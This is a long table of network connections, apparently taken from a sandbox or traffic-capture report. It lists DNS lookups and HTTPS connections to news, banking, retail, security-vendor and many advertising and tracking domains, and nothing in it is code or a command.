| US | 151.101.1.164:443 | www.nytimes.com | tcp |
| US | 151.101.1.164:443 | www.nytimes.com | tcp |
| US | 151.101.1.164:443 | www.nytimes.com | tcp |
| US | 8.8.8.8:53 | zillow.com | udp |
| NL | 52.222.139.122:443 | zillow.com | tcp |
| US | 8.8.8.8:53 | 166.3.121.144.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 170.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.38.239.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.25.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 164.1.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 122.139.222.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.zillow.com | udp |
| NL | 13.227.219.64:443 | www.zillow.com | tcp |
| US | 8.8.8.8:53 | content.kaspersky-labs.com | udp |
| US | 8.8.8.8:53 | media.kaspersky.com | udp |
| US | 144.121.3.166:443 | content.kaspersky-labs.com | tcp |
| US | 144.121.3.166:443 | content.kaspersky-labs.com | tcp |
| US | 144.121.3.166:443 | content.kaspersky-labs.com | tcp |
| US | 144.121.3.166:443 | content.kaspersky-labs.com | tcp |
| US | 144.121.3.166:443 | content.kaspersky-labs.com | tcp |
| US | 144.121.3.166:443 | content.kaspersky-labs.com | tcp |
| US | 144.121.3.184:443 | media.kaspersky.com | tcp |
| US | 8.8.8.8:53 | pinterest.com | udp |
| US | 151.101.0.84:443 | pinterest.com | tcp |
| US | 151.101.0.84:443 | pinterest.com | tcp |
| US | 151.101.0.84:443 | pinterest.com | tcp |
| US | 8.8.8.8:53 | www.pinterest.com | udp |
| NL | 104.85.4.195:443 | www.pinterest.com | tcp |
| US | 151.101.0.84:443 | pinterest.com | tcp |
| US | 8.8.8.8:53 | 64.219.227.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 184.3.121.144.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.0.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.4.85.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | s.pinimg.com | udp |
| NL | 199.232.148.84:443 | s.pinimg.com | tcp |
| US | 8.8.8.8:53 | yelp.com | udp |
| NL | 151.101.36.116:443 | yelp.com | tcp |
| US | 8.8.8.8:53 | dpm.demdex.net | udp |
| IE | 52.31.139.111:443 | dpm.demdex.net | tcp |
| US | 8.8.8.8:53 | 84.148.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 116.36.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 111.139.31.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api-router.kaspersky-labs.com | udp |
| US | 144.121.3.166:443 | api-router.kaspersky-labs.com | tcp |
| US | 144.121.3.166:443 | api-router.kaspersky-labs.com | tcp |
| US | 8.8.8.8:53 | stackoverflow.com | udp |
| US | 151.101.193.69:443 | stackoverflow.com | tcp |
| NL | 88.221.25.131:443 | service.maxymiser.net | tcp |
| US | 144.121.3.166:443 | api-router.kaspersky-labs.com | tcp |
| US | 8.8.8.8:53 | kaspersky.demdex.net | udp |
| US | 8.8.8.8:53 | kaspersky.d3.sc.omtrdc.net | udp |
| US | 8.8.8.8:53 | cm.everesttech.net | udp |
| IE | 52.208.175.244:443 | kaspersky.demdex.net | tcp |
| US | 63.140.62.164:443 | kaspersky.d3.sc.omtrdc.net | tcp |
| IE | 52.208.181.207:443 | cm.everesttech.net | tcp |
| US | 8.8.8.8:53 | 69.193.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 244.175.208.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 164.62.140.63.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 207.181.208.52.in-addr.arpa | udp |
| US | 144.121.3.166:443 | api-router.kaspersky-labs.com | tcp |
| US | 8.8.8.8:53 | cdn.gbqofs.com | udp |
| US | 104.18.25.13:443 | cdn.gbqofs.com | tcp |
| US | 8.8.8.8:53 | snap.licdn.com | udp |
| US | 8.8.8.8:53 | bat.bing.com | udp |
| US | 8.8.8.8:53 | tag.aumago.com | udp |
| US | 204.79.197.200:443 | bat.bing.com | tcp |
| NL | 52.222.139.19:443 | tag.aumago.com | tcp |
| NL | 95.101.74.199:443 | snap.licdn.com | tcp |
| NL | 52.222.139.19:443 | tag.aumago.com | tcp |
| US | 8.8.8.8:53 | resources.xg4ken.com | udp |
| US | 8.8.8.8:53 | mc.yandex.ru | udp |
| RU | 87.250.250.119:443 | mc.yandex.ru | tcp |
| US | 8.8.8.8:53 | js.go2sdk.com | udp |
| US | 8.8.8.8:53 | connect.facebook.net | udp |
| US | 8.8.8.8:53 | 13.25.18.104.in-addr.arpa | udp |
| US | 18.239.94.44:443 | js.go2sdk.com | tcp |
| US | 44.196.77.99:443 | resources.xg4ken.com | tcp |
| GB | 157.240.221.16:443 | connect.facebook.net | udp |
| US | 8.8.8.8:53 | store.kaspersky.com | udp |
| US | 45.60.31.126:443 | store.kaspersky.com | tcp |
| US | 8.8.8.8:53 | s.tribalfusion.com | udp |
| US | 104.18.24.173:443 | s.tribalfusion.com | udp |
| US | 8.8.8.8:53 | optimizationguide-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | optimizationguide-pa.googleapis.com | udp |
| NL | 142.251.39.106:443 | optimizationguide-pa.googleapis.com | udp |
| US | 144.121.3.166:443 | api-router.kaspersky-labs.com | tcp |
| US | 8.8.8.8:53 | c1001.report.gbss.io | udp |
| US | 8.8.8.8:53 | ib.adnxs.com | udp |
| DE | 37.252.173.215:443 | ib.adnxs.com | tcp |
| IE | 52.31.147.89:443 | c1001.report.gbss.io | tcp |
| US | 8.8.8.8:53 | 19.139.222.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 199.74.101.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 44.94.239.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.77.196.44.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.250.250.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 126.31.60.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.24.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.23.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.173.252.37.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 89.147.31.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | mc.yandex.com | udp |
| US | 8.8.8.8:53 | cdn.linkedin.oribi.io | udp |
| US | 8.8.8.8:53 | px.ads.linkedin.com | udp |
| NL | 52.222.139.95:443 | cdn.linkedin.oribi.io | tcp |
| US | 13.107.42.14:443 | px.ads.linkedin.com | tcp |
| US | 8.8.8.8:53 | 12346775.fls.doubleclick.net | udp |
| NL | 142.250.179.134:443 | 12346775.fls.doubleclick.net | tcp |
| NL | 142.250.179.134:443 | 12346775.fls.doubleclick.net | udp |
| US | 8.8.8.8:53 | lib.selfcampaign.com | udp |
| DE | 167.233.11.232:443 | lib.selfcampaign.com | tcp |
| US | 45.60.31.126:443 | store.kaspersky.com | tcp |
| US | 8.8.8.8:53 | a.tribalfusion.com | udp |
| US | 8.8.8.8:53 | 232.11.233.167.in-addr.arpa | udp |
| US | 151.101.193.69:443 | stackoverflow.com | tcp |
| US | 151.101.193.69:443 | stackoverflow.com | tcp |
| US | 8.8.8.8:53 | www.facebook.com | udp |
| NL | 157.240.201.35:443 | www.facebook.com | udp |
| US | 8.8.8.8:53 | cdn.sstatic.net | udp |
| US | 151.101.193.69:443 | cdn.sstatic.net | tcp |
| US | 8.8.8.8:53 | wellsfargo.com | udp |
| NL | 88.221.25.40:443 | wellsfargo.com | tcp |
| US | 8.8.8.8:53 | www.wellsfargo.com | udp |
| NL | 2.19.195.168:443 | www.wellsfargo.com | tcp |
| US | 8.8.8.8:53 | 35.201.240.157.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 40.25.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 168.195.19.2.in-addr.arpa | udp |
| NL | 88.221.25.40:443 | wellsfargo.com | tcp |
| US | 8.8.8.8:53 | www17.wellsfargomedia.com | udp |
| NL | 23.222.58.49:443 | www17.wellsfargomedia.com | tcp |
| NL | 2.19.195.168:443 | www.wellsfargo.com | tcp |
| US | 8.8.8.8:53 | embed.tawk.to | udp |
| US | 104.22.25.131:443 | embed.tawk.to | tcp |
| US | 8.8.8.8:53 | myshopify.com | udp |
| NL | 142.251.36.1:443 | yt3.ggpht.com | udp |
| CA | 23.227.38.32:443 | myshopify.com | tcp |
| US | 8.8.8.8:53 | www.googletagservices.com | udp |
| CA | 23.227.38.32:443 | myshopify.com | tcp |
| US | 8.8.8.8:53 | 49.58.222.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.25.22.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.38.227.23.in-addr.arpa | udp |
| CA | 23.227.38.32:443 | myshopify.com | tcp |
| US | 8.8.8.8:53 | cdn.shopify.com | udp |
| CA | 23.227.60.200:80 | cdn.shopify.com | tcp |
| CA | 23.227.60.200:443 | cdn.shopify.com | tcp |
| US | 8.8.8.8:53 | tumblr.com | udp |
| US | 192.0.77.40:443 | tumblr.com | tcp |
| US | 8.8.8.8:53 | www.tumblr.com | udp |
| US | 192.0.77.40:443 | www.tumblr.com | tcp |
| US | 8.8.8.8:53 | 200.60.227.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 40.77.0.192.in-addr.arpa | udp |
| US | 144.121.3.166:443 | api-router.kaspersky-labs.com | tcp |
| US | 8.8.8.8:53 | dclk-match.dotomi.com | udp |
| US | 192.0.77.40:443 | www.tumblr.com | tcp |
| US | 8.8.8.8:53 | sync.mathtag.com | udp |
| NL | 89.207.16.201:443 | dclk-match.dotomi.com | tcp |
| CH | 185.29.132.245:443 | sync.mathtag.com | tcp |
| US | 52.223.40.198:443 | match.adsrvr.org | tcp |
| NL | 178.250.1.9:443 | dis.criteo.com | tcp |
| US | 8.8.8.8:53 | c1.adform.net | udp |
| US | 8.8.8.8:53 | cm.g.doubleclick.net | udp |
| NL | 142.251.36.2:443 | cm.g.doubleclick.net | udp |
| DK | 37.157.6.233:443 | c1.adform.net | tcp |
| US | 74.119.119.150:443 | widget.us.criteo.com | tcp |
| US | 8.8.8.8:53 | 201.16.207.89.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 245.132.29.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.6.157.37.in-addr.arpa | udp |
| US | 192.0.77.40:443 | www.tumblr.com | tcp |
| US | 8.8.8.8:53 | assets.tumblr.com | udp |
| US | 192.0.77.40:443 | assets.tumblr.com | tcp |
| US | 8.8.8.8:53 | hulu.com | udp |
| NL | 104.110.240.91:443 | hulu.com | tcp |
| US | 8.8.8.8:53 | www.hulu.com | udp |
| NL | 104.110.240.91:80 | www.hulu.com | tcp |
| NL | 104.110.240.91:443 | www.hulu.com | tcp |
| US | 8.8.8.8:53 | 91.240.110.104.in-addr.arpa | udp |
| NL | 104.110.240.91:443 | www.hulu.com | tcp |
| NL | 104.110.240.91:80 | www.hulu.com | tcp |
| NL | 104.110.240.91:443 | www.hulu.com | tcp |
| US | 104.22.25.131:443 | embed.tawk.to | udp |
| US | 18.239.94.101:443 | fixthephoto.com | udp |
| US | 8.8.8.8:53 | va.tawk.to | udp |
| US | 104.22.25.131:443 | va.tawk.to | tcp |
| US | 104.22.25.131:443 | va.tawk.to | udp |
| US | 8.8.8.8:53 | vsb50.tawk.to | udp |
| US | 172.67.38.66:443 | vsb50.tawk.to | tcp |
| US | 151.101.1.229:443 | cdn.jsdelivr.net | udp |
| US | 8.8.8.8:53 | 66.38.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | w.clarity.ms | udp |
| US | 23.96.124.156:443 | w.clarity.ms | tcp |
| US | 8.8.8.8:53 | t0.gstatic.com | udp |
| NL | 142.250.179.132:443 | t0.gstatic.com | tcp |
| US | 8.8.8.8:53 | msn.com | udp |
| US | 204.79.197.219:443 | msn.com | tcp |
| US | 8.8.8.8:53 | www.msn.com | udp |
| US | 204.79.197.219:443 | msn.com | tcp |
| US | 8.8.8.8:53 | t1.gstatic.com | udp |
| NL | 142.250.179.132:443 | t1.gstatic.com | tcp |
| US | 8.8.8.8:53 | bankofamerica.com | udp |
| US | 171.159.228.150:443 | bankofamerica.com | tcp |
| US | 8.8.8.8:53 | www.bankofamerica.com | udp |
| US | 171.161.116.100:443 | www.bankofamerica.com | tcp |
| US | 8.8.8.8:53 | 219.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 150.228.159.171.in-addr.arpa | udp |
| US | 171.159.228.150:443 | bankofamerica.com | tcp |
| US | 8.8.8.8:53 | 100.116.161.171.in-addr.arpa | udp |
| US | 171.161.116.100:443 | www.bankofamerica.com | tcp |
| US | 8.8.8.8:53 | www1.bac-assets.com | udp |
| US | 192.229.163.230:443 | www1.bac-assets.com | tcp |
| IE | 52.31.147.89:443 | c1001.report.gbss.io | tcp |
| US | 8.8.8.8:53 | sohu.com | udp |
| RU | 77.88.21.119:443 | mc.yandex.com | tcp |
| CN | 61.135.164.50:443 | sohu.com | tcp |
| US | 8.8.8.8:53 | 230.163.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.21.88.77.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.sohu.com | udp |
| NL | 43.175.22.27:443 | www.sohu.com | tcp |
| US | 8.8.8.8:53 | 50.164.135.61.in-addr.arpa | udp |
| NL | 43.175.22.27:80 | www.sohu.com | tcp |
| US | 8.8.8.8:53 | 27.22.175.43.in-addr.arpa | udp |
| CN | 61.135.164.50:443 | sohu.com | tcp |
| NL | 43.175.22.27:443 | www.sohu.com | tcp |
| US | 8.8.8.8:53 | zmt.itc.cn | udp |
| GB | 138.113.101.12:80 | zmt.itc.cn | tcp |
| US | 8.8.8.8:53 | 12.101.113.138.in-addr.arpa | udp |
| US | 8.8.8.8:53 | etsy.com | udp |
| US | 151.101.1.224:443 | etsy.com | tcp |
| US | 8.8.8.8:53 | www.etsy.com | udp |
| NL | 104.85.0.22:443 | www.etsy.com | tcp |
| US | 151.101.1.224:443 | etsy.com | tcp |
| US | 8.8.8.8:53 | 224.1.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.0.85.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | i.ytimg.com | udp |
| NL | 216.58.214.22:443 | i.ytimg.com | udp |
| US | 8.8.8.8:53 | encrypted-vtbn0.gstatic.com | udp |
| NL | 142.251.36.14:443 | encrypted-vtbn0.gstatic.com | tcp |
| US | 8.8.8.8:53 | beacons.gvt2.com | udp |
| US | 192.178.48.227:443 | beacons.gvt2.com | udp |
| US | 104.16.53.48:443 | static.mediafire.com | tcp |
| US | 104.16.54.48:443 | static.mediafire.com | tcp |
| US | 192.178.48.227:443 | beacons.gvt2.com | tcp |
| US | 8.8.8.8:53 | rr4---sn-5hnednss.googlevideo.com | udp |
| NL | 172.217.132.201:443 | rr4---sn-5hnednss.googlevideo.com | udp |
| US | 8.8.8.8:53 | 48.54.16.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rr3---sn-5hnekn7z.googlevideo.com | udp |
| NL | 74.125.100.104:443 | rr3---sn-5hnekn7z.googlevideo.com | udp |
| US | 8.8.8.8:53 | 201.132.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.100.125.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | beacons.gcp.gvt2.com | udp |
| NL | 142.251.36.34:443 | www.googletagservices.com | udp |
| US | 8.8.8.8:53 | jnn-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | static.doubleclick.net | udp |
| NL | 142.251.36.6:443 | static.doubleclick.net | udp |
| NL | 142.251.36.1:443 | yt3.ggpht.com | udp |
| US | 104.16.53.48:443 | static.mediafire.com | tcp |
| GB | 157.240.221.16:443 | connect.facebook.net | udp |
| US | 8.8.8.8:53 | cdn.amplitude.com | udp |
| NL | 108.156.61.29:443 | cdn.amplitude.com | tcp |
| US | 8.8.8.8:53 | fundingchoicesmessages.google.com | udp |
| NL | 142.250.179.206:443 | fundingchoicesmessages.google.com | udp |
| US | 8.8.8.8:53 | 29.61.156.108.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.amplitude.com | udp |
| US | 54.244.183.200:443 | api.amplitude.com | tcp |
| NL | 142.250.179.206:443 | fundingchoicesmessages.google.com | udp |
| GB | 157.240.221.16:443 | connect.facebook.net | udp |
| GB | 157.240.221.16:443 | connect.facebook.net | tcp |
| NL | 157.240.201.35:443 | www.facebook.com | udp |
| US | 8.8.8.8:53 | lh3.googleusercontent.com | udp |
| NL | 216.58.214.14:443 | analytics.google.com | udp |
| NL | 142.250.102.155:443 | stats.g.doubleclick.net | udp |
| US | 104.16.53.48:443 | static.mediafire.com | tcp |
| DE | 172.217.23.202:443 | jnn-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | btloader.com | udp |
| US | 8.8.8.8:53 | securepubads.g.doubleclick.net | udp |
| US | 104.26.6.139:443 | btloader.com | tcp |
| US | 54.244.183.200:443 | api.amplitude.com | tcp |
| US | 8.8.8.8:53 | 139.6.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cdn.otnolatrnup.com | udp |
| US | 104.19.214.37:443 | cdn.otnolatrnup.com | tcp |
| US | 8.8.8.8:53 | btlr.sharethrough.com | udp |
| US | 8.8.8.8:53 | prebid.media.net | udp |
| US | 8.8.8.8:53 | hbopenbid.pubmatic.com | udp |
| US | 52.55.204.172:443 | btlr.sharethrough.com | tcp |
| US | 52.55.204.172:443 | btlr.sharethrough.com | tcp |
| US | 52.55.204.172:443 | btlr.sharethrough.com | tcp |
| US | 52.55.204.172:443 | btlr.sharethrough.com | tcp |
| US | 52.55.204.172:443 | btlr.sharethrough.com | tcp |
| NL | 185.64.189.112:443 | hbopenbid.pubmatic.com | tcp |
| US | 34.107.148.139:443 | prebid.media.net | tcp |
| US | 8.8.8.8:53 | api.btloader.com | udp |
| US | 8.8.8.8:53 | ad-delivery.net | udp |
| US | 130.211.23.194:443 | api.btloader.com | tcp |
| US | 104.26.2.70:443 | ad-delivery.net | tcp |
| US | 104.26.2.70:443 | ad-delivery.net | tcp |
| US | 8.8.8.8:53 | 37.214.19.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 112.189.64.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 139.148.107.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.204.55.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.2.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | download2437.mediafire.com | udp |
| US | 199.91.155.178:443 | download2437.mediafire.com | tcp |
| US | 199.91.155.178:443 | download2437.mediafire.com | tcp |
| US | 8.8.8.8:53 | 178.155.91.199.in-addr.arpa | udp |
| US | 23.36.244.189:443 | ads.pubmatic.com | tcp |
| US | 8.8.8.8:53 | google.com | udp |
| NL | 142.250.179.142:443 | google.com | tcp |
| US | 8.8.8.8:53 | 189.244.36.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 142.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | image6.pubmatic.com | udp |
| NL | 198.47.127.19:443 | image6.pubmatic.com | tcp |
| US | 8.8.8.8:53 | d5p.de17a.com | udp |
| SE | 213.155.156.182:443 | d5p.de17a.com | tcp |
| NL | 178.250.1.9:443 | dis.criteo.com | tcp |
| US | 74.119.119.150:443 | widget.us.criteo.com | tcp |
| US | 8.8.8.8:53 | 19.127.47.198.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 182.156.155.213.in-addr.arpa | udp |
| US | 8.8.8.8:53 | p.rfihub.com | udp |
| NL | 193.0.160.130:443 | p.rfihub.com | tcp |
| US | 8.8.8.8:53 | image2.pubmatic.com | udp |
| US | 162.248.18.37:443 | image2.pubmatic.com | tcp |
| US | 8.8.8.8:53 | aax-eu.amazon-adsystem.com | udp |
| IE | 67.220.224.150:443 | aax-eu.amazon-adsystem.com | tcp |
| NL | 142.251.36.2:443 | cm.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | sync.crwdcntrl.net | udp |
| US | 8.8.8.8:53 | cr.frontend.weborama.fr | udp |
| US | 8.8.8.8:53 | a.audrte.com | udp |
| US | 52.206.89.97:443 | a.audrte.com | tcp |
| US | 192.184.69.239:443 | cms.quantserve.com | tcp |
| US | 34.111.129.221:443 | cr.frontend.weborama.fr | tcp |
| US | 34.228.209.226:443 | sync.crwdcntrl.net | tcp |
| US | 8.8.8.8:53 | um.simpli.fi | udp |
| NL | 35.204.74.118:443 | um.simpli.fi | tcp |
| DK | 37.157.6.233:443 | c1.adform.net | tcp |
| US | 52.223.40.198:443 | match.adsrvr.org | tcp |
| US | 8.8.8.8:53 | 130.160.0.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 37.18.248.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 150.224.220.67.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 221.129.111.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.89.206.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.209.228.34.in-addr.arpa | udp |
| US | 34.111.129.221:443 | cr.frontend.weborama.fr | udp |
| US | 23.36.244.189:443 | ads.pubmatic.com | tcp |
| US | 8.8.8.8:53 | 118.74.204.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | simage2.pubmatic.com | udp |
| US | 104.36.113.107:443 | simage2.pubmatic.com | tcp |
| NL | 198.47.127.19:443 | image6.pubmatic.com | tcp |
| US | 8.8.8.8:53 | simage4.pubmatic.com | udp |
| US | 8.28.7.84:443 | simage4.pubmatic.com | tcp |
| US | 8.8.8.8:53 | 107.113.36.104.in-addr.arpa | udp |
| DE | 37.252.173.215:443 | ib.adnxs.com | tcp |
| US | 8.8.8.8:53 | dsp.adfarm1.adition.com | udp |
| DE | 85.114.159.93:443 | dsp.adfarm1.adition.com | tcp |
| US | 8.8.8.8:53 | sync.srv.stackadapt.com | udp |
| US | 54.204.149.114:443 | sync.srv.stackadapt.com | tcp |
| US | 8.8.8.8:53 | 84.7.28.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | match.prod.bidr.io | udp |
| US | 52.2.41.26:443 | match.prod.bidr.io | tcp |
| DE | 172.217.23.202:443 | jnn-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | bh.contextweb.com | udp |
| US | 198.148.27.131:443 | bh.contextweb.com | tcp |
| US | 8.8.8.8:53 | 93.159.114.85.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 114.149.204.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.41.2.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sync.technoratimedia.com | udp |
| US | 150.136.156.92:443 | sync.technoratimedia.com | tcp |
| US | 8.8.8.8:53 | rtb-csync.smartadserver.com | udp |
| FR | 185.86.139.104:443 | rtb-csync.smartadserver.com | tcp |
| US | 8.8.8.8:53 | 131.27.148.198.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 92.156.136.150.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.139.86.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.adx.opera.com | udp |
| NL | 82.145.213.8:443 | t.adx.opera.com | tcp |
| US | 8.8.8.8:53 | mwzeom.zeotap.com | udp |
| US | 8.8.8.8:53 | uipglob.semasio.net | udp |
| US | 172.67.13.182:443 | mwzeom.zeotap.com | tcp |
| DK | 77.243.51.121:443 | uipglob.semasio.net | tcp |
| US | 8.8.8.8:53 | pixel.onaudience.com | udp |
| FR | 141.94.170.77:443 | pixel.onaudience.com | tcp |
| US | 8.8.8.8:53 | pr-bh.ybp.yahoo.com | udp |
| IE | 54.217.214.211:443 | pr-bh.ybp.yahoo.com | tcp |
| US | 8.8.8.8:53 | ups.analytics.yahoo.com | udp |
| US | 8.8.8.8:53 | x.bidswitch.net | udp |
| US | 8.8.8.8:53 | pubmatic-match.dotomi.com | udp |
| US | 8.8.8.8:53 | ad.turn.com | udp |
| NL | 46.228.164.11:443 | ad.turn.com | tcp |
| DE | 3.75.62.37:443 | ups.analytics.yahoo.com | tcp |
| NL | 63.215.202.137:443 | pubmatic-match.dotomi.com | tcp |
| US | 35.211.178.172:443 | x.bidswitch.net | tcp |
| US | 8.8.8.8:53 | dmp.adform.net | udp |
| DK | 37.157.2.234:443 | dmp.adform.net | tcp |
| US | 8.8.8.8:53 | uipus.semasio.net | udp |
| US | 50.57.31.206:443 | uipus.semasio.net | tcp |
| US | 8.8.8.8:53 | 8.213.145.82.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 182.13.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 77.170.94.141.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 121.51.243.77.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 211.214.217.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 37.62.75.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 137.202.215.63.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.2.157.37.in-addr.arpa | udp |
| US | 52.206.89.97:443 | a.audrte.com | tcp |
| US | 8.8.8.8:53 | a.sportradarserving.com | udp |
| FR | 141.94.170.77:443 | pixel.onaudience.com | tcp |
| US | 35.211.233.246:443 | a.sportradarserving.com | tcp |
| US | 8.28.7.84:443 | simage4.pubmatic.com | tcp |
| US | 8.8.8.8:53 | tags.bluekai.com | udp |
| DE | 88.221.168.166:443 | tags.bluekai.com | tcp |
| US | 8.8.8.8:53 | 246.233.211.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 166.168.221.88.in-addr.arpa | udp |
| US | 35.211.233.246:443 | a.sportradarserving.com | udp |
| US | 104.36.113.107:443 | simage2.pubmatic.com | tcp |
| US | 23.96.124.156:443 | w.clarity.ms | tcp |
| NL | 142.251.36.14:443 | encrypted-vtbn0.gstatic.com | udp |
| US | 8.8.8.8:53 | update.googleapis.com | udp |
| US | 8.8.8.8:53 | update.googleapis.com | udp |
| NL | 142.250.179.163:443 | update.googleapis.com | udp |
| NL | 142.250.179.163:443 | update.googleapis.com | tcp |
| NL | 142.251.36.34:443 | www.googletagservices.com | udp |
| NL | 198.47.127.19:443 | image6.pubmatic.com | tcp |
| US | 151.101.2.49:443 | sync-tm.everesttech.net | tcp |
| US | 8.8.8.8:53 | csync.loopme.me | udp |
| NL | 35.214.225.178:443 | csync.loopme.me | tcp |
| US | 104.36.113.107:443 | simage2.pubmatic.com | tcp |
| US | 8.8.8.8:53 | cm.adgrx.com | udp |
| NL | 173.231.181.122:443 | cm.adgrx.com | tcp |
| US | 8.8.8.8:53 | ipac.ctnsnet.com | udp |
| US | 35.186.193.173:443 | ipac.ctnsnet.com | tcp |
| US | 8.8.8.8:53 | core.iprom.net | udp |
| SI | 195.5.165.20:443 | core.iprom.net | tcp |
| US | 50.57.31.206:443 | uipus.semasio.net | tcp |
| US | 8.8.8.8:53 | 178.225.214.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 122.181.231.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.165.5.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cm-supply-web.gammaplatform.com | udp |
| SG | 52.220.229.2:443 | cm-supply-web.gammaplatform.com | tcp |
| US | 8.8.8.8:53 | green.erne.co | udp |
| FR | 141.94.240.141:443 | green.erne.co | tcp |
| US | 8.8.8.8:53 | pixel-eu.onaudience.com | udp |
| FR | 141.94.171.213:443 | pixel-eu.onaudience.com | tcp |
| US | 162.248.18.37:443 | image2.pubmatic.com | tcp |
| US | 8.8.8.8:53 | ps.eyeota.net | udp |
| US | 3.233.22.19:443 | ps.eyeota.net | tcp |
| US | 8.8.8.8:53 | pixel-sync.sitescout.com | udp |
| NL | 98.98.134.241:443 | pixel-sync.sitescout.com | tcp |
| US | 104.18.25.173:443 | a.tribalfusion.com | udp |
| US | 8.8.8.8:53 | match.adsby.bidtheatre.com | udp |
| NL | 64.227.64.62:443 | match.adsby.bidtheatre.com | tcp |
| US | 8.8.8.8:53 | 2.229.220.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 141.240.94.141.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 213.171.94.141.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.22.233.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.134.98.98.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 62.64.227.64.in-addr.arpa | udp |
| US | 8.28.7.84:443 | simage4.pubmatic.com | tcp |
| GB | 216.58.208.99:443 | beacons3.gvt2.com | udp |
| NL | 198.47.127.19:443 | image6.pubmatic.com | tcp |
| US | 8.8.8.8:53 | ad.mrtnsvr.com | udp |
| US | 34.102.163.6:443 | ad.mrtnsvr.com | tcp |
| US | 104.36.113.107:443 | simage2.pubmatic.com | tcp |
| US | 8.8.8.8:53 | matching.truffle.bid | udp |
| DE | 23.88.86.2:443 | matching.truffle.bid | tcp |
| US | 8.8.8.8:53 | 6.163.102.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.86.88.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sync.1rx.io | udp |
| US | 199.127.204.147:443 | sync.1rx.io | tcp |
| NL | 46.228.164.11:443 | ad.turn.com | tcp |
| US | 8.8.8.8:53 | sync.targeting.unrulymedia.com | udp |
| US | 199.127.204.142:443 | sync.targeting.unrulymedia.com | tcp |
| US | 8.8.8.8:53 | 147.204.127.199.in-addr.arpa | udp |
